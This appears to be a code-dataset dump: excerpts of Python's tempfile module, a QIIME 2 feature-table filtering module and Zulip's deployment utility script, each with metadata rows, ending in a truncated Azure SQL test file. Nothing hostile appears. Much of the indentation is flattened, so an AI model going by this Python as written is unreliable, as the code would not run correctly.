def TemporaryFile(mode='w+b', buffering=-1, encoding=None,
newline=None, suffix=None, prefix=None,
dir=None):
"""Create and return a temporary file.
Arguments:
'prefix', 'suffix', 'dir' -- as for mkstemp.
'mode' -- the mode argument to io.open (default "w+b").
'buffering' -- the buffer size argument to io.open (default -1).
'encoding' -- the encoding argument to io.open (default None)
'newline' -- the newline argument to io.open (default None)
The file is created as mkstemp() would do it.
Returns an object with a file-like interface. The file has no
name, and will cease to exist when it is closed.
"""
global _O_TMPFILE_WORKS
prefix, suffix, dir, output_type = _sanitize_params(prefix, suffix, dir)
flags = _bin_openflags
if _O_TMPFILE_WORKS:
try:
flags2 = (flags | _os.O_TMPFILE) & ~_os.O_CREAT
fd = _os.open(dir, flags2, 0o600)
except IsADirectoryError:
# Linux kernel older than 3.11 ignores O_TMPFILE flag.
# Set flag to False to not try again.
_O_TMPFILE_WORKS = False
except OSError:
# The filesystem of the directory does not support O_TMPFILE.
# For example, OSError(95, 'Operation not supported').
pass
else:
try:
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
# Fallback to _mkstemp_inner().
(fd, name) = _mkstemp_inner(dir, prefix, suffix, flags, output_type)
try:
_os.unlink(name)
return _io.open(fd, mode, buffering=buffering,
newline=newline, encoding=encoding)
except:
_os.close(fd)
raise
class SpooledTemporaryFile:
_rolled = False
def __init__(self, max_size=0, mode='w+b', buffering=-1,
encoding=None, newline=None,
suffix=None, prefix=None, dir=None):
if 'b' in mode:
self._file = _io.BytesIO()
else:
# Setting newline="\n" avoids newline translation;
            # this is important because otherwise on Windows we'd
            # get double newline translation upon rollover().
self._file = _io.StringIO(newline="\n")
self._max_size = max_size
self._rolled = False
self._TemporaryFileArgs = {'mode': mode, 'buffering': buffering,
'suffix': suffix, 'prefix': prefix,
'encoding': encoding, 'newline': newline,
'dir': dir}
def _check(self, file):
if self._rolled: return
max_size = self._max_size
if max_size and file.tell() > max_size:
self.rollover()
def rollover(self):
if self._rolled: return
file = self._file
newfile = self._file = TemporaryFile(**self._TemporaryFileArgs)
del self._TemporaryFileArgs
newfile.write(file.getvalue())
newfile.seek(file.tell(), 0)
self._rolled = True
    # The method caching trick from NamedTemporaryFile
    # won't work here, because _file may change from a
    # BytesIO/StringIO instance to a real file.  So we list
# all the methods directly.
# Context management protocol
def __enter__(self):
if self._file.closed:
raise ValueError("Cannot enter context with closed file")
return self
def __exit__(self, exc, value, tb):
self._file.close()
# file protocol
def __iter__(self):
return self._file.__iter__()
def close(self):
self._file.close()
@property
def closed(self):
return self._file.closed
@property
def encoding(self):
try:
return self._file.encoding
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['encoding']
def fileno(self):
self.rollover()
return self._file.fileno()
def flush(self):
self._file.flush()
def isatty(self):
return self._file.isatty()
@property
def mode(self):
try:
return self._file.mode
except AttributeError:
return self._TemporaryFileArgs['mode']
@property
def name(self):
try:
return self._file.name
except AttributeError:
return None
@property
def newlines(self):
try:
return self._file.newlines
except AttributeError:
if 'b' in self._TemporaryFileArgs['mode']:
raise
return self._TemporaryFileArgs['newline']
def read(self, *args):
return self._file.read(*args)
def readline(self, *args):
return self._file.readline(*args)
def readlines(self, *args):
return self._file.readlines(*args)
def seek(self, *args):
self._file.seek(*args)
@property
def softspace(self):
return self._file.softspace
def tell(self):
return self._file.tell()
def truncate(self, size=None):
if size is None:
self._file.truncate()
else:
if size > self._max_size:
self.rollover()
self._file.truncate(size)
def write(self, s):
file = self._file
rv = file.write(s)
self._check(file)
return rv
def writelines(self, iterable):
file = self._file
rv = file.writelines(iterable)
self._check(file)
return rv
class TemporaryDirectory(object):
def __init__(self, suffix=None, prefix=None, dir=None):
self.name = mkdtemp(suffix, prefix, dir)
self._finalizer = _weakref.finalize(
self, self._cleanup, self.name,
warn_message="Implicitly cleaning up {!r}".format(self))
@classmethod
def _cleanup(cls, name, warn_message):
_shutil.rmtree(name)
_warnings.warn(warn_message, ResourceWarning)
def __repr__(self):
return "<{} {!r}>".format(self.__class__.__name__, self.name)
def __enter__(self):
return self.name
def __exit__(self, exc, value, tb):
self.cleanup()
def cleanup(self):
if self._finalizer.detach():
_shutil.rmtree(self.name)
| true
| true
|
f707cbfb17d3f0aaabf8186795d08e5f8861d69f
| 4,763
|
py
|
Python
|
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
q2_feature_table/_filter.py
|
andrewsanchez/q2-feature-table
|
9ed6160adad45445ec054e5ce034a3b3ba25a9b4
|
[
"BSD-3-Clause"
] | null | null | null |
# ----------------------------------------------------------------------------
# Copyright (c) 2016-2020, QIIME 2 development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file LICENSE, distributed with this software.
# ----------------------------------------------------------------------------
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
# filter on the opposite axis to remove any entities that now have a
# frequency of zero
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
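# Illustrative usage sketch (not part of the original module); assumes the
# standard biom.Table(data, observation_ids, sample_ids) constructor.
#
#     table = biom.Table(np.array([[0, 1, 3], [1, 1, 2]]),
#                        ['O1', 'O2'], ['S1', 'S2', 'S3'])
#     # Keep only samples with a total frequency of at least 3: 'S3' sums
#     # to 5 and is kept; 'S1' (sum 1) and 'S2' (sum 2) are dropped.
#     filtered = filter_samples(table, min_frequency=3)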
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
# Note, no need to check for missing feature IDs in the metadata,
# because that is basically the point of this method.
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
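# Illustrative usage sketch (not part of the original module): keep only the
# sequences whose feature IDs are still present in a previously filtered
# table (`filtered_table` below is a hypothetical biom.Table).
#
#     seqs = pd.Series({'O1': 'ACGT', 'O2': 'TTGA', 'O3': 'GGCC'})
#     kept = filter_seqs(seqs, table=filtered_table)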
| 41.780702
| 78
| 0.622297
|
import biom
import qiime2
import numpy as np
import pandas as pd
def _get_biom_filter_function(ids_to_keep, min_frequency, max_frequency,
min_nonzero, max_nonzero):
ids_to_keep = set(ids_to_keep)
if max_frequency is None:
max_frequency = np.inf
if max_nonzero is None:
max_nonzero = np.inf
def f(data_vector, id_, metadata):
return (id_ in ids_to_keep) and \
(min_frequency <= data_vector.sum() <= max_frequency) and \
(min_nonzero <= (data_vector > 0).sum() <= max_nonzero)
return f
_other_axis_map = {'sample': 'observation', 'observation': 'sample'}
def _filter_table(table, min_frequency, max_frequency, min_nonzero,
max_nonzero, metadata, where, axis, exclude_ids=False):
if min_frequency == 0 and max_frequency is None and min_nonzero == 0 and\
max_nonzero is None and metadata is None and where is None and\
exclude_ids is False:
raise ValueError("No filtering was requested.")
if metadata is None and where is not None:
raise ValueError("Metadata must be provided if 'where' is "
"specified.")
if metadata is None and exclude_ids is True:
raise ValueError("Metadata must be provided if 'exclude_ids' "
"is True.")
if metadata is not None:
ids_to_keep = metadata.get_ids(where=where)
else:
ids_to_keep = table.ids(axis=axis)
if exclude_ids is True:
ids_to_keep = set(table.ids(axis=axis)) - set(ids_to_keep)
filter_fn1 = _get_biom_filter_function(
ids_to_keep, min_frequency, max_frequency, min_nonzero, max_nonzero)
table.filter(filter_fn1, axis=axis, inplace=True)
filter_fn2 = _get_biom_filter_function(
ids_to_keep=table.ids(axis=_other_axis_map[axis]), min_frequency=0,
max_frequency=None, min_nonzero=1, max_nonzero=None)
table.filter(filter_fn2, axis=_other_axis_map[axis], inplace=True)
def filter_samples(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_features: int = 0,
max_features: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_features,
max_nonzero=max_features, metadata=metadata,
where=where, axis='sample', exclude_ids=exclude_ids)
return table
def filter_features(table: biom.Table, min_frequency: int = 0,
max_frequency: int = None, min_samples: int = 0,
max_samples: int = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False)\
-> biom.Table:
_filter_table(table=table, min_frequency=min_frequency,
max_frequency=max_frequency, min_nonzero=min_samples,
max_nonzero=max_samples, metadata=metadata,
where=where, axis='observation', exclude_ids=exclude_ids)
return table
def filter_seqs(data: pd.Series, table: biom.Table = None,
metadata: qiime2.Metadata = None, where: str = None,
exclude_ids: bool = False) -> pd.Series:
if table is not None and metadata is not None:
raise ValueError('Filtering with metadata and filtering with a table '
'are mutually exclusive.')
elif table is None and metadata is None:
raise ValueError('No filtering requested. Must provide either table '
'or metadata.')
elif table is not None:
ids_to_keep = table.ids(axis='observation')
else:
ids_to_keep = metadata.get_ids(where=where)
if exclude_ids is True:
ids_to_keep = set(data.index) - set(ids_to_keep)
filtered = data[data.index.isin(ids_to_keep)]
if filtered.empty is True:
raise ValueError('All features were filtered out of the data.')
return filtered
| true
| true
|
f707cc59db04834474887b8af1640934d57e50d9
| 19,428
|
py
|
Python
|
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | 2
|
2020-09-12T13:36:15.000Z
|
2021-06-28T18:10:41.000Z
|
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | null | null | null |
scripts/lib/zulip_tools.py
|
shubhamgupta2956/zulip
|
77091c7b17a0a37392eaa8765d46e3c673da081a
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
import argparse
import configparser
import datetime
import functools
import hashlib
import json
import logging
import os
import pwd
import random
import re
import shlex
import shutil
import subprocess
import sys
import time
import uuid
from typing import Any, Dict, List, Sequence, Set
from urllib.parse import SplitResult
DEPLOYMENTS_DIR = "/home/zulip/deployments"
LOCK_DIR = os.path.join(DEPLOYMENTS_DIR, "lock")
TIMESTAMP_FORMAT = '%Y-%m-%d-%H-%M-%S'
# Color codes
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BLACKONYELLOW = '\x1b[0;30;43m'
WHITEONRED = '\x1b[0;37;41m'
BOLDRED = '\x1B[1;31m'
GREEN = '\x1b[32m'
YELLOW = '\x1b[33m'
BLUE = '\x1b[34m'
MAGENTA = '\x1b[35m'
CYAN = '\x1b[36m'
def overwrite_symlink(src: str, dst: str) -> None:
dir, base = os.path.split(dst)
while True:
# Note: creating a temporary filename like this is not generally
# secure. It’s fine in this case because os.symlink refuses to
# overwrite an existing target; we handle the error and try again.
tmp = os.path.join(dir, ".{}.{:010x}".format(base, random.randrange(1 << 40)))
try:
os.symlink(src, tmp)
except FileExistsError:
continue
break
try:
os.rename(tmp, dst)
except Exception:
os.remove(tmp)
raise
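# Illustrative usage sketch (not part of the original module): atomically
# repoint the "current" deployment symlink; os.rename() replaces the old
# link in a single step, so readers never observe a missing symlink.
#
#     overwrite_symlink("/home/zulip/deployments/2020-09-12-13-36-15",
#                       "/home/zulip/deployments/current")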
def parse_cache_script_args(description: str) -> argparse.Namespace:
# Keep this in sync with clean_unused_caches in provision_inner.py
parser = argparse.ArgumentParser(description=description)
parser.add_argument(
"--threshold", dest="threshold_days", type=int, default=14,
metavar="<days>", help="Any cache which is not in "
"use by a deployment not older than threshold days(current "
"installation in dev) and older than threshold days will be "
"deleted. (defaults to 14)")
parser.add_argument(
"--dry-run", action="store_true",
help="If specified then script will only print the caches "
"that it will delete/keep back. It will not delete any cache.")
parser.add_argument(
"--verbose", action="store_true",
help="If specified then script will print a detailed report "
"of what is being will deleted/kept back.")
parser.add_argument(
"--no-print-headings", dest="no_headings", action="store_true",
help="If specified then script will not print headings for "
"what will be deleted/kept back.")
args = parser.parse_args()
args.verbose |= args.dry_run # Always print a detailed report in case of dry run.
return args
def get_deploy_root() -> str:
return os.path.realpath(
os.path.normpath(os.path.join(os.path.dirname(__file__), "..", "..")),
)
def get_deployment_version(extract_path: str) -> str:
version = '0.0.0'
for item in os.listdir(extract_path):
item_path = os.path.join(extract_path, item)
if item.startswith('zulip-server') and os.path.isdir(item_path):
with open(os.path.join(item_path, 'version.py')) as f:
result = re.search('ZULIP_VERSION = "(.*)"', f.read())
if result:
version = result.groups()[0]
break
return version
def is_invalid_upgrade(current_version: str, new_version: str) -> bool:
if new_version > '1.4.3' and current_version <= '1.3.10':
return True
return False
def subprocess_text_output(args: Sequence[str]) -> str:
return subprocess.check_output(args, universal_newlines=True).strip()
def get_zulip_pwent() -> pwd.struct_passwd:
deploy_root_uid = os.stat(get_deploy_root()).st_uid
if deploy_root_uid != 0:
return pwd.getpwuid(deploy_root_uid)
# In the case that permissions got messed up and the deployment
# directory is unexpectedly owned by root, we fallback to the
# `zulip` user as that's the correct value in production.
return pwd.getpwnam("zulip")
def get_postgres_pwent() -> pwd.struct_passwd:
try:
return pwd.getpwnam("postgres")
except KeyError:
return get_zulip_pwent()
def su_to_zulip(save_suid: bool = False) -> None:
"""Warning: su_to_zulip assumes that the zulip checkout is owned by
the zulip user (or whatever normal user is running the Zulip
installation). It should never be run from the installer or other
production contexts before /home/zulip/deployments/current is
created."""
pwent = get_zulip_pwent()
os.setgid(pwent.pw_gid)
if save_suid:
os.setresuid(pwent.pw_uid, pwent.pw_uid, os.getuid())
else:
os.setuid(pwent.pw_uid)
os.environ['HOME'] = pwent.pw_dir
def make_deploy_path() -> str:
timestamp = datetime.datetime.now().strftime(TIMESTAMP_FORMAT)
return os.path.join(DEPLOYMENTS_DIR, timestamp)
TEMPLATE_DATABASE_DIR = "test-backend/databases"
def get_dev_uuid_var_path(create_if_missing: bool = False) -> str:
zulip_path = get_deploy_root()
uuid_path = os.path.join(os.path.realpath(os.path.dirname(zulip_path)), ".zulip-dev-uuid")
if os.path.exists(uuid_path):
with open(uuid_path) as f:
zulip_uuid = f.read().strip()
else:
if create_if_missing:
zulip_uuid = str(uuid.uuid4())
# We need root access here, since the path will be under /srv/ in the
# development environment.
run_as_root(["sh", "-c", 'echo "$1" > "$2"', "-",
zulip_uuid, uuid_path])
else:
raise AssertionError("Missing UUID file; please run tools/provision!")
result_path = os.path.join(zulip_path, "var", zulip_uuid)
os.makedirs(result_path, exist_ok=True)
return result_path
def get_deployment_lock(error_rerun_script: str) -> None:
start_time = time.time()
got_lock = False
while time.time() - start_time < 300:
try:
os.mkdir(LOCK_DIR)
got_lock = True
break
except OSError:
print(WARNING + "Another deployment in progress; waiting for lock... " +
"(If no deployment is running, rmdir {})".format(LOCK_DIR) + ENDC)
sys.stdout.flush()
time.sleep(3)
if not got_lock:
print(FAIL + "Deployment already in progress. Please run\n" +
" {}\n".format(error_rerun_script) +
"manually when the previous deployment finishes, or run\n" +
" rmdir {}\n".format(LOCK_DIR) +
"if the previous deployment crashed." +
ENDC)
sys.exit(1)
def release_deployment_lock() -> None:
shutil.rmtree(LOCK_DIR)
def run(args: Sequence[str], **kwargs: Any) -> None:
# Output what we're doing in the `set -x` style
print("+ {}".format(" ".join(map(shlex.quote, args))))
try:
subprocess.check_call(args, **kwargs)
except subprocess.CalledProcessError:
print()
print(WHITEONRED + "Error running a subcommand of {}: {}".format(
sys.argv[0], " ".join(map(shlex.quote, args)),
) + ENDC)
print(WHITEONRED + "Actual error output for the subcommand is just above this." +
ENDC)
print()
raise
def log_management_command(cmd: str, log_path: str) -> None:
log_dir = os.path.dirname(log_path)
if not os.path.exists(log_dir):
os.makedirs(log_dir)
formatter = logging.Formatter("%(asctime)s: %(message)s")
file_handler = logging.FileHandler(log_path)
file_handler.setFormatter(formatter)
logger = logging.getLogger("zulip.management")
logger.addHandler(file_handler)
logger.setLevel(logging.INFO)
logger.info("Ran '%s'", cmd)
def get_environment() -> str:
if os.path.exists(DEPLOYMENTS_DIR):
return "prod"
return "dev"
def get_recent_deployments(threshold_days: int) -> Set[str]:
    # Returns the set of deployments not older than threshold days,
    # including the `/root/zulip` directory if it exists.
recent = set()
threshold_date = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
for dir_name in os.listdir(DEPLOYMENTS_DIR):
target_dir = os.path.join(DEPLOYMENTS_DIR, dir_name)
if not os.path.isdir(target_dir):
# Skip things like uwsgi sockets, symlinks, etc.
continue
if not os.path.exists(os.path.join(target_dir, "zerver")):
# Skip things like "lock" that aren't actually a deployment directory
continue
try:
date = datetime.datetime.strptime(dir_name, TIMESTAMP_FORMAT)
if date >= threshold_date:
recent.add(target_dir)
except ValueError:
# Always include deployments whose name is not in the format of a timestamp.
recent.add(target_dir)
# If it is a symlink then include the target as well.
if os.path.islink(target_dir):
recent.add(os.path.realpath(target_dir))
if os.path.exists("/root/zulip"):
recent.add("/root/zulip")
return recent
def get_threshold_timestamp(threshold_days: int) -> int:
    # Given a number of days, this function returns the timestamp
    # corresponding to the point in time that many days ago.
threshold = datetime.datetime.now() - datetime.timedelta(days=threshold_days)
threshold_timestamp = int(time.mktime(threshold.utctimetuple()))
return threshold_timestamp
def get_caches_to_be_purged(caches_dir: str, caches_in_use: Set[str], threshold_days: int) -> Set[str]:
    # Given a directory containing caches, the set of caches in use,
    # and a threshold in days, this function returns the set of caches
# which can be purged. Remove the cache only if it is:
    # 1: Not in use by the current installation (in dev as well as in prod).
    # 2: Not in use by a deployment not older than `threshold_days` (in prod).
# 3: Not in use by '/root/zulip'.
# 4: Not older than `threshold_days`.
caches_to_purge = set()
threshold_timestamp = get_threshold_timestamp(threshold_days)
for cache_dir_base in os.listdir(caches_dir):
cache_dir = os.path.join(caches_dir, cache_dir_base)
if cache_dir in caches_in_use:
# Never purge a cache which is in use.
continue
if os.path.getctime(cache_dir) < threshold_timestamp:
caches_to_purge.add(cache_dir)
return caches_to_purge
def purge_unused_caches(
caches_dir: str, caches_in_use: Set[str], cache_type: str, args: argparse.Namespace,
) -> None:
all_caches = {os.path.join(caches_dir, cache) for cache in os.listdir(caches_dir)}
caches_to_purge = get_caches_to_be_purged(caches_dir, caches_in_use, args.threshold_days)
caches_to_keep = all_caches - caches_to_purge
may_be_perform_purging(
caches_to_purge, caches_to_keep, cache_type, args.dry_run, args.verbose, args.no_headings)
if args.verbose:
print("Done!")
def generate_sha1sum_emoji(zulip_path: str) -> str:
sha = hashlib.sha1()
filenames = [
'static/assets/zulip-emoji/zulip.png',
'tools/setup/emoji/emoji_map.json',
'tools/setup/emoji/build_emoji',
'tools/setup/emoji/emoji_setup_utils.py',
'tools/setup/emoji/emoji_names.py',
]
for filename in filenames:
file_path = os.path.join(zulip_path, filename)
with open(file_path, 'rb') as reader:
sha.update(reader.read())
# Take into account the version of `emoji-datasource-google` package
# while generating success stamp.
PACKAGE_FILE_PATH = os.path.join(zulip_path, 'package.json')
with open(PACKAGE_FILE_PATH) as fp:
parsed_package_file = json.load(fp)
dependency_data = parsed_package_file['dependencies']
if 'emoji-datasource-google' in dependency_data:
with open(os.path.join(zulip_path, "yarn.lock")) as fp:
(emoji_datasource_version,) = re.findall(
r"^emoji-datasource-google@"
+ re.escape(dependency_data["emoji-datasource-google"])
+ r':\n version "(.*)"',
fp.read(),
re.M,
)
else:
emoji_datasource_version = "0"
sha.update(emoji_datasource_version.encode())
return sha.hexdigest()
def may_be_perform_purging(
dirs_to_purge: Set[str],
dirs_to_keep: Set[str],
dir_type: str,
dry_run: bool,
verbose: bool,
no_headings: bool,
) -> None:
if dry_run:
print("Performing a dry run...")
if not no_headings:
print("Cleaning unused {}s...".format(dir_type))
for directory in dirs_to_purge:
if verbose:
print("Cleaning unused {}: {}".format(dir_type, directory))
if not dry_run:
run_as_root(["rm", "-rf", directory])
for directory in dirs_to_keep:
if verbose:
print("Keeping used {}: {}".format(dir_type, directory))
@functools.lru_cache(None)
def parse_os_release() -> Dict[str, str]:
"""
Example of the useful subset of the data:
{
'ID': 'ubuntu',
'VERSION_ID': '18.04',
'NAME': 'Ubuntu',
'VERSION': '18.04.3 LTS (Bionic Beaver)',
'PRETTY_NAME': 'Ubuntu 18.04.3 LTS',
}
VERSION_CODENAME (e.g. 'bionic') is nice and human-readable, but
we avoid using it, as it is not available on RHEL-based platforms.
"""
distro_info = {} # type: Dict[str, str]
with open('/etc/os-release') as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
# The line may be blank or a comment, see:
# https://www.freedesktop.org/software/systemd/man/os-release.html
continue
k, v = line.split('=', 1)
[distro_info[k]] = shlex.split(v)
return distro_info
@functools.lru_cache(None)
def os_families() -> Set[str]:
"""
Known families:
debian (includes: debian, ubuntu)
ubuntu (includes: ubuntu)
fedora (includes: fedora, rhel, centos)
rhel (includes: rhel, centos)
centos (includes: centos)
"""
distro_info = parse_os_release()
return {distro_info["ID"], *distro_info.get("ID_LIKE", "").split()}
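# Illustrative usage sketch (not part of the original module): family checks
# cover derivatives, e.g. Ubuntu belongs to the "debian" family via ID_LIKE.
#
#     if "debian" in os_families():
#         ...  # apt-based code path
#     elif "fedora" in os_families():
#         ...  # yum/dnf-based code path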
def files_and_string_digest(filenames: Sequence[str],
extra_strings: Sequence[str]) -> str:
# see is_digest_obsolete for more context
sha1sum = hashlib.sha1()
for fn in filenames:
with open(fn, 'rb') as file_to_hash:
sha1sum.update(file_to_hash.read())
for extra_string in extra_strings:
sha1sum.update(extra_string.encode("utf-8"))
return sha1sum.hexdigest()
def is_digest_obsolete(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> bool:
'''
In order to determine if we need to run some
process, we calculate a digest of the important
files and strings whose respective contents
or values may indicate such a need.
filenames = files we should hash the contents of
extra_strings = strings we should hash directly
Grep for callers to see examples of how this is used.
To elaborate on extra_strings, they will typically
be things like:
- package versions (that we import)
- settings values (that we stringify with
json, deterministically)
'''
last_hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
try:
with open(last_hash_path) as f:
old_hash = f.read()
except FileNotFoundError:
# This is normal for a fresh checkout--a missing
# digest is an obsolete digest.
return True
new_hash = files_and_string_digest(filenames, extra_strings)
return new_hash != old_hash
def write_new_digest(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> None:
hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
new_hash = files_and_string_digest(filenames, extra_strings)
with open(hash_path, 'w') as f:
f.write(new_hash)
# Be a little verbose here--our callers ensure we
# only write new digests when things have changed, and
# making this system more transparent to developers
# can help them troubleshoot provisioning glitches.
print('New digest written to: ' + hash_path)
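# Illustrative usage sketch (not part of the original module): the two digest
# helpers pair up as a "run only when the inputs changed" guard.
#
#     if is_digest_obsolete("npm_hash", ["package.json", "yarn.lock"]):
#         ...  # do the expensive provisioning step
#         write_new_digest("npm_hash", ["package.json", "yarn.lock"])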
def is_root() -> bool:
if 'posix' in os.name and os.geteuid() == 0:
return True
return False
def run_as_root(args: List[str], **kwargs: Any) -> None:
sudo_args = kwargs.pop('sudo_args', [])
if not is_root():
args = ['sudo', *sudo_args, '--', *args]
run(args, **kwargs)
def assert_not_running_as_root() -> None:
script_name = os.path.abspath(sys.argv[0])
if is_root():
pwent = get_zulip_pwent()
msg = ("{shortname} should not be run as root. Use `su {user}` to switch to the 'zulip'\n"
"user before rerunning this, or use \n su {user} -c '{name} ...'\n"
"to switch users and run this as a single command.").format(
name=script_name,
shortname=os.path.basename(script_name),
user=pwent.pw_name)
print(msg)
sys.exit(1)
def assert_running_as_root(strip_lib_from_paths: bool=False) -> None:
script_name = os.path.abspath(sys.argv[0])
# Since these Python scripts are run inside a thin shell wrapper,
# we need to replace the paths in order to ensure we instruct
# users to (re)run the right command.
if strip_lib_from_paths:
script_name = script_name.replace("scripts/lib/upgrade", "scripts/upgrade")
if not is_root():
print("{} must be run as root.".format(script_name))
sys.exit(1)
def get_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
default_value: str = "",
) -> str:
if config_file.has_option(section, key):
return config_file.get(section, key)
return default_value
def set_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
value: str,
) -> None:
if not config_file.has_section(section):
config_file.add_section(section)
config_file.set(section, key, value)
def get_config_file() -> configparser.RawConfigParser:
config_file = configparser.RawConfigParser()
config_file.read("/etc/zulip/zulip.conf")
return config_file
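# Illustrative usage sketch (not part of the original module): read a setting
# from /etc/zulip/zulip.conf, falling back to a default when absent.  The
# section/key shown are just an example.
#
#     config = get_config_file()
#     classes = get_config(config, "machine", "puppet_classes", default_value="")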
def get_deploy_options(config_file: configparser.RawConfigParser) -> List[str]:
return get_config(config_file, 'deployment', 'deploy_options', "").strip().split()
def get_or_create_dev_uuid_var_path(path: str) -> str:
absolute_path = '{}/{}'.format(get_dev_uuid_var_path(), path)
os.makedirs(absolute_path, exist_ok=True)
return absolute_path
def is_vagrant_env_host(path: str) -> bool:
return '.vagrant' in os.listdir(path)
def deport(netloc: str) -> str:
"""Remove the port from a hostname:port string. Brackets on a literal
IPv6 address are included."""
r = SplitResult("", netloc, "", "", "")
assert r.hostname is not None
return "[" + r.hostname + "]" if ":" in r.hostname else r.hostname
if __name__ == '__main__':
cmd = sys.argv[1]
if cmd == 'make_deploy_path':
print(make_deploy_path())
elif cmd == 'get_dev_uuid':
print(get_dev_uuid_var_path())
| 36.044527
| 103
| 0.648446
|
hexsha: f707cd250d370f16f94ca0d06c3d986e3b974eec | size: 12396 | ext: py | lang: Python
path: sdk/sql/azure-mgmt-sql/tests/test_cli_mgmt_sql_managed_instance.py
repo: zeinab-mk/azure-sdk-for-python @ 847e95a542506239db4aa6c12fa5ae35aa7d5e56
licenses: ["MIT"] | stars: 1 (2022-03-08 to 2022-03-08)
# coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# Current Operation Coverage:
# ManagedInstances: 6/8
# ManagedInstanceOperations: 1/3
import unittest
import azure.mgmt.sql
from azure.core.exceptions import HttpResponseError
from devtools_testutils import AzureMgmtRecordedTestCase, RandomNameResourceGroupPreparer, ResourceGroupPreparer, recorded_by_proxy
AZURE_LOCATION = 'eastus'
class MgmtSqlTest(AzureMgmtRecordedTestCase):
def setup_method(self, method):
self.client = self.create_mgmt_client(
azure.mgmt.sql.SqlManagementClient
)
# self.mgmt_client180601 = self.create_mgmt_client(
# azure.mgmt.sql.SqlManagementClient,
# api_version="2018-06-01-preview"
# )
# if self.is_live:
# from azure.mgmt.network import NetworkManagementClient
# self.network_client = self.create_mgmt_client(
# NetworkManagementClient
# )
def create_virtual_network(self, group_name, location, security_group_name, route_table_name, network_name, subnet_name):
# Create network security group
network_security_group = self.network_client.network_security_groups.begin_create_or_update(
group_name,
security_group_name,
{
"location": location
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
